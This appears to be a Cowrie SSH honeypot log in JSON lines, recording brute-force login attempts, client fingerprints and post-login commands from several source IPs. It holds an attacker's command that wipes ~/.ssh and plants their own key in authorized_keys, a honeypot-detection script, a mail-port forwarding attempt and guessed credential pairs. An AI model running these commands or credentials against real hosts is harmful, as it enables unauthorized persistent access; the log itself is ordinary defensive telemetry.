{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-28T02:04:47.990692Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-28T02:04:48.012474Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:48.013726Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.50.33","src_port":48936,"dst_ip":"1.2.3.4","dst_port":22,"session":"c4ad099ccfb2","protocol":"ssh","message":"New connection: 147.45.50.33:48936 (1.2.3.4:22) [session: c4ad099ccfb2]","sensor":"my-vps","timestamp":"2025-08-28T02:04:48.031285Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:04:48.032070Z","src_ip":"147.45.50.33","session":"c4ad099ccfb2"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:04:48.051817Z","src_ip":"147.45.50.33","session":"c4ad099ccfb2"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-28T02:04:48.172865Z","src_ip":"147.45.50.33","session":"c4ad099ccfb2"}
{"eventid":"cowrie.session.closed","duration":"1.2","message":"Connection lost after 1.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:49.194568Z","src_ip":"147.45.50.33","session":"c4ad099ccfb2"}
{"eventid":"cowrie.session.connect","src_ip":"147.45.50.33","src_port":48940,"dst_ip":"1.2.3.4","dst_port":22,"session":"4f47e6be4594","protocol":"ssh","message":"New connection: 147.45.50.33:48940 (1.2.3.4:22) [session: 4f47e6be4594]","sensor":"my-vps","timestamp":"2025-08-28T02:04:49.213215Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-28T02:04:49.213922Z","src_ip":"147.45.50.33","session":"4f47e6be4594"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-28T02:04:49.233482Z","src_ip":"147.45.50.33","session":"4f47e6be4594"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:04:49.352837Z","src_ip":"147.45.50.33","session":"4f47e6be4594"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:49.374101Z","src_ip":"147.45.50.33","session":"b182a84f9eda"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:49.374986Z","src_ip":"147.45.50.33","session":"4f47e6be4594"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":45768,"dst_ip":"1.2.3.4","dst_port":22,"session":"3df7641bb6af","protocol":"ssh","message":"New connection: 194.233.79.134:45768 (1.2.3.4:22) [session: 3df7641bb6af]","sensor":"my-vps","timestamp":"2025-08-28T02:04:54.328160Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:04:54.508930Z","src_ip":"194.233.79.134","session":"3df7641bb6af"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:04:54.582570Z","src_ip":"194.233.79.134","session":"3df7641bb6af"}
{"eventid":"cowrie.login.failed","username":"gitlab-runner","password":"gitlab-runner","message":"login attempt [gitlab-runner/gitlab-runner] failed","sensor":"my-vps","timestamp":"2025-08-28T02:04:55.796952Z","src_ip":"194.233.79.134","session":"3df7641bb6af"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:04:57.233623Z","src_ip":"194.233.79.134","session":"3df7641bb6af"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46521,"dst_ip":"1.2.3.4","dst_port":22,"session":"6af70736f7c3","protocol":"ssh","message":"New connection: 212.227.125.160:46521 (1.2.3.4:22) [session: 6af70736f7c3]","sensor":"my-vps","timestamp":"2025-08-28T02:06:27.676197Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:06:27.696532Z","src_ip":"212.227.125.160","session":"6af70736f7c3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T02:06:27.776020Z","src_ip":"212.227.125.160","session":"6af70736f7c3"}
{"eventid":"cowrie.login.success","username":"root","password":"Aa112211","message":"login attempt [root/Aa112211] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:06:28.138893Z","src_ip":"212.227.125.160","session":"6af70736f7c3"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"81.19.77.166","dst_port":587,"src_ip":"212.227.125.160","src_port":22,"message":"direct-tcp connection request to 81.19.77.166:587 from 127.0.0.1:22","sensor":"my-vps","timestamp":"2025-08-28T02:06:28.220071Z","session":"6af70736f7c3"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"81.19.77.166","dst_port":587,"data":"b'E'","id":0,"message":"discarded direct-tcp forward request 0 to 81.19.77.166:587 with data b'E'","sensor":"my-vps","timestamp":"2025-08-28T02:06:28.300613Z","src_ip":"212.227.125.160","session":"6af70736f7c3"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:06:28.382406Z","src_ip":"212.227.125.160","session":"6af70736f7c3"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":35626,"dst_ip":"1.2.3.4","dst_port":22,"session":"a772ccf8df38","protocol":"ssh","message":"New connection: 194.233.79.134:35626 (1.2.3.4:22) [session: a772ccf8df38]","sensor":"my-vps","timestamp":"2025-08-28T02:06:37.690203Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:06:38.926024Z","src_ip":"194.233.79.134","session":"a772ccf8df38"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:06:38.926832Z","src_ip":"194.233.79.134","session":"a772ccf8df38"}
{"eventid":"cowrie.login.failed","username":"es","password":"es123456","message":"login attempt [es/es123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:06:42.610147Z","src_ip":"194.233.79.134","session":"a772ccf8df38"}
{"eventid":"cowrie.session.closed","duration":"6.1","message":"Connection lost after 6.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:06:43.798282Z","src_ip":"194.233.79.134","session":"a772ccf8df38"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":54302,"dst_ip":"1.2.3.4","dst_port":22,"session":"620ab923de51","protocol":"ssh","message":"New connection: 217.72.205.35:54302 (1.2.3.4:22) [session: 620ab923de51]","sensor":"my-vps","timestamp":"2025-08-28T02:06:49.196405Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:06:49.197443Z","src_ip":"217.72.205.35","session":"620ab923de51"}
{"eventid":"cowrie.session.connect","src_ip":"130.185.122.7","src_port":58976,"dst_ip":"1.2.3.4","dst_port":22,"session":"dd9e06c9d552","protocol":"ssh","message":"New connection: 130.185.122.7:58976 (1.2.3.4:22) [session: dd9e06c9d552]","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.533065Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.534122Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.552001Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.login.success","username":"root","password":"20202020","message":"login attempt [root/20202020] succeeded","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.606977Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T02:07:26.717423Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.input","input":"cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","message":"CMD: cpu=$(grep 'model name' /proc/cpuinfo 2>/dev/null || echo \"\"); memtotal=$(grep MemTotal /proc/meminfo 2>/dev/null || echo \"\"); if [ -z \"$cpu\" ] || [ -z \"$memtotal\" ]; then;   echo \"honeypot\"; else;   echo \"valid\"; fi","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.718148Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.input","input":"grep model name /proc/cpuinfo 2 > /dev/null","message":"CMD: grep model name /proc/cpuinfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.718588Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.720194Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.input","input":"grep MemTotal /proc/meminfo 2 > /dev/null","message":"CMD: grep MemTotal /proc/meminfo 2 > /dev/null","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.720901Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.input","input":"echo","message":"CMD: echo","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.721957Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.failed","input":"if [ -z ]","message":"Command not found: if [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.722883Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.failed","input":"[ -z ]","message":"Command not found: [ -z ]","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.723699Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.failed","input":"then","message":"Command not found: then","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.724543Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.failed","input":"else","message":"Command not found: else","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.725382Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.command.failed","input":"fi","message":"Command not found: fi","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.726579Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","shasum":"070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","destfile":"/dev/null","message":"Saved redir contents with SHA-256 070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac to var/lib/cowrie/downloads/070ef897c927dd6cf0c126aac1ceeb42568d1317637b2b6d2d9a34c00d6050ac","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.745519Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","size":289,"shasum":"69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/69511eb870a7e7e4bb856e916177c6cfbf759338aba8c9e5f229f7f12d820104 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.746267Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:07:26.747373Z","src_ip":"130.185.122.7","session":"dd9e06c9d552"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39450,"dst_ip":"1.2.3.4","dst_port":22,"session":"fe040ab6339d","protocol":"ssh","message":"New connection: 212.227.235.229:39450 (1.2.3.4:22) [session: fe040ab6339d]","sensor":"my-vps","timestamp":"2025-08-28T02:07:31.726198Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T02:07:31.726979Z","src_ip":"212.227.235.229","session":"fe040ab6339d"}
{"eventid":"cowrie.client.kex","hassh":"4e066189c3bbeec38c99b1855113733a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-512-cert-v01@openssh.com","rsa-sha2-256-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 4e066189c3bbeec38c99b1855113733a","sensor":"my-vps","timestamp":"2025-08-28T02:07:31.831295Z","src_ip":"212.227.235.229","session":"fe040ab6339d"}
{"eventid":"cowrie.login.failed","username":"app","password":"app123456","message":"login attempt [app/app123456] failed","sensor":"my-vps","timestamp":"2025-08-28T02:07:32.143275Z","src_ip":"212.227.235.229","session":"fe040ab6339d"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T02:07:33.249585Z","src_ip":"212.227.235.229","session":"fe040ab6339d"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":62097,"dst_ip":"1.2.3.4","dst_port":22,"session":"d5c913db014a","protocol":"ssh","message":"New connection: 212.227.235.229:62097 (1.2.3.4:22) [session: d5c913db014a]","sensor":"my-vps","timestamp":"2025-08-28T02:07:36.610276Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T02:07:36.611282Z","src_ip":"212.227.235.229","session":"d5c913db014a"}
